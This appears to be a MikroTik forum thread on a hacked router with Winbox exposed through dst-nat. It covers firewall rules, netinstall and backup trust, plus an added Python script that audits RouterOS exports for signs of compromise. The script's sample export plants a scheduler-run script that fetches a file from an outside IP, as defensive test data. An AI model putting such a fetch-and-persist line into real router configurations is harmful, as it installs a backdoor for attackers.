I agree, until you know more that title is speculation and unnecessary.
It could be just as accurate to state, I'M AN INSECURE ADMIN, HELP.
Why would you leave Winbox open to the internet?
Did you at least use Port Knocking techniques?
Why was access not via VPN?
Was the router hacked previously and not reconfigured via netinstall??

Currently there are no new known Winbox port vulnerabilities.
If you are sure that after the first hack you reinstalled the router and changed login credentials, then contact support.
There are cases where routers get "hacked" even after an upgrade, because already stolen credentials were not changed.
Sorry to hear about your issue Redmond. However, for router access, I wouldn't count on source list protection as being a good security practice. Perhaps with a server of some sort that is isolated from one's LAN, that may be sufficient, and assuming that the server has credentials login, BUT to the router NO EFFING WAY.

1. Winbox isn't open to the Internet, I have a firewall that accepts only connections from my address list.
2. I don't use port knocking.
3. I don't need VPN access for this, I'm the ISP of the customer.
4. Yes, but I don't know if it's the same vulnerability that was spotted in April. I already found alexey attacks that block that vulnerability with a firewall, but this isn't the case.

> Currently there are no new known Winbox port vulnerabilities.
> If you are sure that after the first hack you reinstalled the router and changed login credentials, then contact support.
> There are cases where routers get "hacked" even after an upgrade, because already stolen credentials were not changed.

mrz, are you sure you are MT support LOL. From all my simple readings, a re-install does not cure a properly hacked unit (from the hacker's perspective); one needs to do a NET INSTALL (which I gather erases memory that a normal reinstall doesn't touch??).
> However, for router access, I wouldn't count on source list protection as being a good security practice.

In this particular case I have a dst-nat with dst-port 8292 and to-ports 8291 (for example to-addresses 192.168.88.2) and no other ports forwarded.
I just wanted to comment on this: you seemed to indicate that you made an accept rule for your address list??
You should do that all on the NAT rule.....
ex.
add action=dst-nat chain=dstnat comment=Solar_UDP dst-port=zz \
    in-interface-list=WAN log=yes protocol=udp src-address-list=Solar_Panel \
    to-addresses=192.168.z.zz
The best thing to do is to take the RB, burn it and use another one, updated.
> "Regardless of version used, all RouterOS versions that have the default firewall enabled, are not vulnerable"

Anav ... should mrz explain again and again and step by step what to do when you are hacked, or could one expect that the author is aware of https://blog.mikrotik.com/ ?
/ip firewall filter
add action=drop chain=input comment=INVALID connection-state=invalid disabled=no
add action=accept chain=input comment="ADMIN" disabled=no src-address-list=admin
add action=accept chain=input comment="Bandwidth Test" disabled=no dst-port=2000 protocol=tcp
add action=accept chain=input comment=ICMP disabled=no protocol=icmp
add action=accept chain=input comment=DNS disabled=no dst-port=53 in-interface=ether1 protocol=tcp
add action=accept chain=input comment=DNS disabled=no dst-port=53 in-interface=ether1 protocol=udp
add action=accept chain=input comment=ESTABLISHED connection-state=established disabled=no
add action=accept chain=input comment=RELATED connection-state=related disabled=no
add action=accept chain=input comment=BROADCAST disabled=no dst-address=255.255.255.255
add action=drop chain=input disabled=no
Side remark/question here:
1.) Instead of netinstall (need to press that button, set IP on the computer), is a downgrade and then an upgrade of ROS equivalent to netinstall, and does it erase all internal memory safely?
2.) I assume once you have a clean router, if you use a "backup" taken on an infected router, could hidden SW/memory be installed again? (I am not talking about the normal settings a hacker could have injected like additional users, scripts etc.)

#1: I don't think so. Netinstall does a low level format, whereas downgrade / upgrade is only an extra step to a ROS version change. I'd go with Netinstall.
#2: I'm willing to bet on "no". If netinstall is required to flush hidden stuff, I'd think that backup/restore, aside from what you've mentioned, would not bring the hidden hacks back.

While you might be right about hidden backdoors not being stored in the backup file, the problem is that backup files are binary and it's hard to be sure there aren't some scripts in it that would re-instate the hidden backdoor. Who knows, a deeply hidden backdoor might change the behaviour of /system backup ...
So when one goes to the level of precaution to netinstall the device, it would be prudent to also not use the configuration backup, which one cannot verify for malicious contents.

Thank you Sir!
Easy for you to fix language slips ... even for a Canadian one can assume with a high level of confidence that he is an English native speaker. Whereas for a resident of continental Europe one can hardly do the same.... fixed one word for you though.

I am sure your spoken and written English is far superior to my basic French writing and speaking and my basic Spanish speaking. "Mein Name ist Anav" is all the German I know besides the usual, Milch and German football clubs LOL. As for the rest, I'm only interested when those of the opposite gender speak English with a native accent...... So sizzling hot!!!
> You should setup VPN instead like PPTP, OVPN, etc. Much safer.

This is just as unsafe (if not worse) as opening Winbox. PPTP, OpenVPN, IPsec etc. are all custom MikroTik implementations of protocols just like Winbox, except with much more complexity. I have no doubt serious security flaws exist in them, just no one has taken the time to look for them yet.
RouterOS can't know which config was added by you and which was added by a rogue user, so either you check the config by hand or clear all of it. RouterOS can remove tools and scripts and such.

But in /export it's easy to see what a rogue user did.
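Two points in this thread come down to reading the exported configuration carefully: anav's advice to put the source restriction on the dst-nat rule itself rather than (only) on an accept rule, and the remark that /export shows what a rogue user did. The following Python script is an added example, not code from the thread or from MikroTik: it parses a constructed /export and flags accounts you did not create, scheduler entries and scripts (the usual persistence), an enabled SOCKS proxy, and any dst-nat rule that forwards to a management port without a src-address-list. The sample export, the set of expected users and the list of management ports are assumptions for the example; adjust them to your own router.

```python
"""Audit a RouterOS `/export` for the kinds of things this thread discusses:
accounts you did not create, persistence via scripts and scheduler, a SOCKS
proxy left enabled, and Winbox (or other management ports) reachable from
the whole Internet through dst-nat. The export below is a constructed sample,
not taken from any real router."""
import re
import shlex

# Constructed sample export. The "svc" user, the scheduler+script pair, the
# enabled SOCKS proxy and the first dst-nat rule are the planted problems;
# the second dst-nat rule is restricted with src-address-list and is fine.
SAMPLE_EXPORT = """\
# constructed sample, not a real export
/ip firewall address-list
add address=203.0.113.10 list=admin
/ip firewall filter
add action=drop chain=input connection-state=invalid
add action=accept chain=input comment=ADMIN src-address-list=admin
add action=drop chain=input
/ip firewall nat
add action=dst-nat chain=dstnat dst-port=8292 protocol=tcp \\
    to-addresses=192.168.88.2 to-ports=8291
add action=dst-nat chain=dstnat dst-port=8293 protocol=tcp \\
    src-address-list=admin to-addresses=192.168.88.3 to-ports=8291
/ip socks
set enabled=yes port=4145
/system scheduler
add interval=1h name=upd on-event=u1 start-time=startup
/system script
add name=u1 source="/tool fetch url=http://198.51.100.7/x dst-path=x"
/user
add group=full name=svc
/ip service
set winbox port=8291
"""

# Assumptions for this example: the accounts you know you created, and the
# ports that count as management access (Winbox, SSH, Telnet, WWW, API).
EXPECTED_USERS = {"admin"}
MGMT_PORTS = {"8291", "22", "23", "80", "443", "8728", "8729"}


def parse_export(text):
    """Return [(menu, command, {key: value}), ...] for each command line.

    Joins RouterOS line continuations (trailing backslash), tracks the
    current menu path ("/ip firewall nat"), and splits key=value pairs with
    shlex so quoted values such as script sources stay intact.
    """
    joined = re.sub(r"\\\n\s*", " ", text)
    menu, entries = None, []
    for raw in joined.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            menu = line
            continue
        words = shlex.split(line)
        kv = {}
        for word in words[1:]:
            key, _, value = word.partition("=")
            kv[key] = value
        entries.append((menu, words[0], kv))
    return entries


def audit(text, expected_users=EXPECTED_USERS):
    """Return sorted finding strings; an empty list means nothing flagged."""
    findings = []
    for menu, cmd, kv in parse_export(text):
        if menu == "/user" and cmd == "add" and kv.get("name") not in expected_users:
            findings.append(f"unexpected user {kv.get('name')} in group {kv.get('group')}")
        elif menu == "/system scheduler" and cmd == "add":
            findings.append(f"scheduler entry {kv.get('name')} runs {kv.get('on-event')}")
        elif menu == "/system script" and cmd == "add":
            findings.append(f"script {kv.get('name')}: {kv.get('source')}")
        elif menu == "/ip socks" and kv.get("enabled") == "yes":
            findings.append("SOCKS proxy enabled")
        elif menu == "/ip firewall nat" and kv.get("action") == "dst-nat":
            # A forward to a management port is only acceptable when the rule
            # itself limits who may hit it (anav's point: do it on the NAT rule).
            port = kv.get("to-ports") or kv.get("dst-port")
            restricted = kv.get("src-address-list") or kv.get("src-address")
            if port in MGMT_PORTS and not restricted:
                findings.append(
                    f"dst-nat to management port {port} on {kv.get('to-addresses')} "
                    "with no src-address-list")
    return sorted(findings)


if __name__ == "__main__":
    for finding in audit(SAMPLE_EXPORT):
        print(finding)
```

Run it against a real `/export` (not `/export compact`, so that every value is visible) taken from the suspect router; a clean export of your own baseline config should produce no findings, and anything it does flag is a line to look at before deciding whether to netinstall and which parts of the configuration to re-enter by hand.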
If you are talking about malware, then:
> "Simply upgrading RouterOS software deletes the malware, any other 3rd party files and closes the vulnerability"

With old versions having root exploits it's entirely possible for the malware to protect itself and persist after an upgrade. Any compromised device should be netinstalled for security (until we end up with malware that persists in the bootloader...).